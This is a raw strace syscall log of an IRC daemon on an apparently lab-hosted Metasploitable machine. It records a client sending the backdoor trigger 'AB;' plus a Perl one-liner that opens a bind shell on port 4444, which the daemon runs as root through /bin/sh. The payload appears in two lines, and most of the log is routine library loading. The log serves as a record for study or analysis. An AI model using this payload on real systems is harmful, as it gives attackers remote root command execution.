4519  07:08:09.037875 select(1024, [2 3 4 7 9], [], NULL, {0, 990000}) = 1 (in [2], left {0, 830000})

4519  07:08:09.199570 clock_gettime(CLOCK_MONOTONIC, {899, 16605144}) = 0

4519  07:08:09.199605 accept(2, 0, NULL) = 8

4519  07:08:09.199626 getpeername(8, {sa_family=AF_INET, sin_port=htons(40439), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:08:09.199658 fcntl64(8, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:08:09.199671 fcntl64(8, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:08:09.199684 setsockopt(8, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:08:09.199696 setsockopt(8, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:08:09.199726 setsockopt(8, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:08:09.199819 getsockopt(8, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:08:09.199849 setsockopt(8, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:08:09.199866 clock_gettime(CLOCK_MONOTONIC, {899, 16879092}) = 0

4519  07:08:09.199877 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 10

4519  07:08:09.199889 fcntl64(10, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:08:09.199899 fcntl64(10, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:08:09.199908 fcntl64(10, F_SETFD, FD_CLOEXEC) = 0

4519  07:08:09.199918 connect(10, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:08:09.199934 send(10, "\213\341\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:08:09.200056 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:08:09.200082 gettimeofday({1495624089, 200086}, NULL) = 0

4519  07:08:09.200094 select(1024, [2 3 4 5 6 7 9 10], [], NULL, {1, 0}) = 1 (in [10], left {0, 990000})

4519  07:08:09.207226 clock_gettime(CLOCK_MONOTONIC, {899, 24248249}) = 0

4519  07:08:09.207250 recvfrom(10, "\213\341\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1\23\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:08:09.207316 close(10)         = 0

4519  07:08:09.207351 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:08:09.207368 send(8, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:08:09.207480 time(NULL)        = 1495624089

4519  07:08:09.207497 time(NULL)        = 1495624089

4519  07:08:09.207510 gettimeofday({1495624089, 207514}, NULL) = 0

4519  07:08:09.207524 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:08:09.207705 clock_gettime(CLOCK_MONOTONIC, {899, 24720068}) = 0

4519  07:08:09.207718 gettimeofday({1495624089, 207722}, NULL) = 0

4519  07:08:09.207729 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [9], left {0, 350000})

4519  07:08:09.855393 clock_gettime(CLOCK_MONOTONIC, {899, 672413964}) = 0

4519  07:08:09.855415 recv(9, "PRIVMSG  #testit3 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71

4519  07:08:09.855440 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855460 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855475 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855489 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855503 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855517 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855530 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855543 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855557 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855570 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855583 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855606 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855619 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855633 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855646 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855659 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855673 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855686 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855699 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855713 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855779 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855794 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 70000}, ...}) = 0

4519  07:08:09.855842 gettimeofday({1495624089, 855845}, NULL) = 0

4519  07:08:09.855854 select(1024, [2 3 4 5 6 7 8 9], [], NULL, {1, 0}) = 1 (in [8], left {1, 0})

4519  07:08:09.855896 clock_gettime(CLOCK_MONOTONIC, {899, 672908697}) = 0

4519  07:08:09.855907 recv(8, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:08:09.855935 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:08:09.855954 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:08:09.855966 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:08:09.855981 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 5213

5213  07:08:09.856054 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

5213  07:08:09.856068 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

5213  07:08:09.856078 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5213  07:08:09.856091 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

5213  07:08:09.856196 brk(0)            = 0x80f9000

5213  07:08:09.856249 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5213  07:08:09.856288 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f99000

5213  07:08:09.856321 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5213  07:08:09.856352 open("/etc/ld.so.cache", O_RDONLY) = 1

5213  07:08:09.856365 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5213  07:08:09.856383 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f91000

5213  07:08:09.856393 close(1)          = 0

5213  07:08:09.856403 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5213  07:08:09.856418 open("/lib/libncurses.so.5", O_RDONLY) = 1

5213  07:08:09.856431 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

5213  07:08:09.856528 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

5213  07:08:09.856545 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f61000

5213  07:08:09.856557 mmap2(0xb7f8e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f8e000

5213  07:08:09.856574 close(1)          = 0

5213  07:08:09.856586 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5213  07:08:09.856599 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5213  07:08:09.856635 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5213  07:08:09.856846 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5213  07:08:09.856881 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f5d000

5213  07:08:09.856893 mmap2(0xb7f5f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f5f000

5213  07:08:09.856909 close(1)          = 0

5213  07:08:09.856920 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5213  07:08:09.856933 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5213  07:08:09.856975 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5213  07:08:09.857080 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5213  07:08:09.857096 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f5c000

5213  07:08:09.857110 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e0d000

5213  07:08:09.857120 mmap2(0xb7f56000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f56000

5213  07:08:09.857138 mmap2(0xb7f59000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f59000

5213  07:08:09.857152 close(1)          = 0

5213  07:08:09.857173 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e0c000

5213  07:08:09.857184 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e0c6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5213  07:08:09.857836 mprotect(0xb7f56000, 4096, PROT_READ) = 0

5213  07:08:09.857962 munmap(0xb7f91000, 29913) = 0

5213  07:08:09.858030 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5213  07:08:09.858063 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

5213  07:08:09.858095 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe6d030) = -1 ENOTTY (Inappropriate ioctl for device)

5213  07:08:09.858134 brk(0)            = 0x80f9000

5213  07:08:09.858143 brk(0x80fa000)    = 0x80fa000

5213  07:08:09.858155 brk(0x80fb000)    = 0x80fb000

5213  07:08:09.858171 getuid32()        = 0

5213  07:08:09.858180 getgid32()        = 0

5213  07:08:09.858188 geteuid32()       = 0

5213  07:08:09.858197 getegid32()       = 0

5213  07:08:09.858210 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5213  07:08:09.858223 time(NULL)        = 1495624089

5213  07:08:09.858236 brk(0x80fc000)    = 0x80fc000

5213  07:08:09.858250 brk(0x80fd000)    = 0x80fd000

5213  07:08:09.858269 open("/proc/meminfo", O_RDONLY) = 1

5213  07:08:09.858291 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

5213  07:08:09.858309 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f98000

5213  07:08:09.858320 read(1, "MemTotal:      1035240 kB\nMemFree:        660948 kB\nBuffers:         63052 kB\nCached:         156304 kB\nSwapCached:          0 kB\nActive:         251452 kB\nInactive:        96832 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        660708 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5404 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52004 kB\nSlab:            14564 kB\nSReclaimable:     6680 kB\nSUnreclaim:       7884 kB\nPageTables:       1956 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

5213  07:08:09.858567 close(1)          = 0

5213  07:08:09.858578 munmap(0xb7f98000, 4096) = 0

5213  07:08:09.858590 brk(0x80fe000)    = 0x80fe000

5213  07:08:09.858617 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5213  07:08:09.858630 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5213  07:08:09.858641 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5213  07:08:09.858653 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5213  07:08:09.858665 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

5213  07:08:09.858676 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

5213  07:08:09.858689 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5213  07:08:09.858700 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5213  07:08:09.858713 uname({sys="Linux", node="metasploitable", ...}) = 0

5213  07:08:09.858760 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

5213  07:08:09.858778 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5213  07:08:09.858796 brk(0x8100000)    = 0x8100000

5213  07:08:09.858807 getcwd("/etc/unreal", 4096) = 12

5213  07:08:09.858821 getpid()          = 5213

5213  07:08:09.858838 getppid()         = 4519

5213  07:08:09.858853 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5213  07:08:09.858872 stat64("/sbin/sh", 0xbfe6d008) = -1 ENOENT (No such file or directory)

5213  07:08:09.858884 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5213  07:08:09.858905 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5213  07:08:09.858981 socket(PF_FILE, SOCK_STREAM, 0) = 1

5213  07:08:09.859012 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5213  07:08:09.859037 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5213  07:08:09.859059 close(1)          = 0

5213  07:08:09.859070 socket(PF_FILE, SOCK_STREAM, 0) = 1

5213  07:08:09.859080 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5213  07:08:09.859089 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5213  07:08:09.859107 close(1)          = 0

5213  07:08:09.859120 open("/etc/nsswitch.conf", O_RDONLY) = 1

5213  07:08:09.859134 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

5213  07:08:09.859150 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f98000

5213  07:08:09.859160 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

5213  07:08:09.859209 read(1, "", 4096) = 0

5213  07:08:09.859218 close(1)          = 0

5213  07:08:09.859227 munmap(0xb7f98000, 4096) = 0

5213  07:08:09.859243 open("/etc/ld.so.cache", O_RDONLY) = 1

5213  07:08:09.859254 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5213  07:08:09.859270 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f91000

5213  07:08:09.859280 close(1)          = 0

5213  07:08:09.859290 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5213  07:08:09.859304 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

5213  07:08:09.859319 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

5213  07:08:09.859407 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

5213  07:08:09.859474 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e03000

5213  07:08:09.859487 mmap2(0xb7e0a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e0a000

5213  07:08:09.859534 close(1)          = 0

5213  07:08:09.859545 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5213  07:08:09.859558 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

5213  07:08:09.859572 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

5213  07:08:09.859661 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

5213  07:08:09.859678 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7deb000

5213  07:08:09.859689 mmap2(0xb7dff000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7dff000

5213  07:08:09.859704 mmap2(0xb7e01000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e01000

5213  07:08:09.859718 close(1)          = 0

5213  07:08:09.859743 munmap(0xb7f91000, 29913) = 0

